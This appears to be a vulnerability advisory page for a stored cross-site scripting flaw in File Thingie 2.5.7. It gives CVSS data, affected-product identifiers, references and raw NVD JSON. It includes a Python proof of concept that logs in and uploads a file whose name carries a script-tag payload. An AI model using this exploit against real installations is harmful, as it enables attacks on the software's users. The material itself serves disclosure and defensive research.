Security Vulnerability Report
CVE-2026-30579 CVSS 6.5 MEDIUM

CVE-2026-30579

Published: 2026-03-20 18:16:13
Last Modified: 2026-04-01 19:01:22

Description

File Thingie 2.5.7 is vulnerable to Cross-Site Scripting (XSS). A malicious user can leverage the "upload file" functionality to upload a file with a crafted file name that triggers a JavaScript payload when the name is rendered.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')

Configurations (Affected Products)

cpe:2.3:a:leefish:file_thingie:2.5.7:*:*:*:*:*:*:* - VULNERABLE
File Thingie 2.5.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://example.com/filethingie/ft2.php"

# Attacker credentials (Low privilege required)
username = "attacker"
password = "password"

# Malicious filename containing XSS payload
# The application reflects the filename directly in the UI
malicious_filename = "<script>alert('CVE-2026-30579_XSS');</script>.txt"

# Create a session to handle cookies
session = requests.Session()

# 1. Login to get a valid session
login_data = {
    "username": username,
    "password": password,
    "submit": "Login"
}
session.post(target_url, data=login_data)

# 2. Prepare file upload
# The filename is where the injection happens
files = {
    'file': (malicious_filename, b'Content of the file', 'text/plain')
}
upload_data = {
    'action': 'upload',
    'submit': 'Upload'
}

# 3. Send the malicious request
response = session.post(target_url, files=files, data=upload_data)

if response.status_code == 200:
    print("[+] Potential upload successful.")
    print("[+] Check the file list page to trigger the XSS.")
else:
    print("[-] Upload failed.")
```

References

https://github.com/SpeWnz/Vulnerability-Research/tree/main/CVE-2026-30579 (Third Party Advisory)
https://github.com/leefish/filethingie (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-30579",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T18:16:13.323",
    "lastModified": "2026-04-01T19:01:22.010",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "File Thingie 2.5.7 is vulnerable to Cross Site Scripting (XSS). A malicious user can leverage the \"upload file\" functionality to upload a file with a crafted file name used to trigger a Javascript payload."
      },
      {
        "lang": "es",
        "value": "File Thingie 2.5.7 es vulnerable a Cross Site Scripting (XSS). Un usuario malicioso puede aprovechar la funcionalidad de 'subir archivo' para subir un archivo con un nombre de archivo manipulado utilizado para activar una carga útil de Javascript."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:leefish:file_thingie:2.5.7:*:*:*:*:*:*:*",
                "matchCriteriaId": "AEFFC71B-7FE1-4570-AA17-5E9E300B8EA9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/SpeWnz/Vulnerability-Research/tree/main/CVE-2026-30579",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://github.com/leefish/filethingie",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```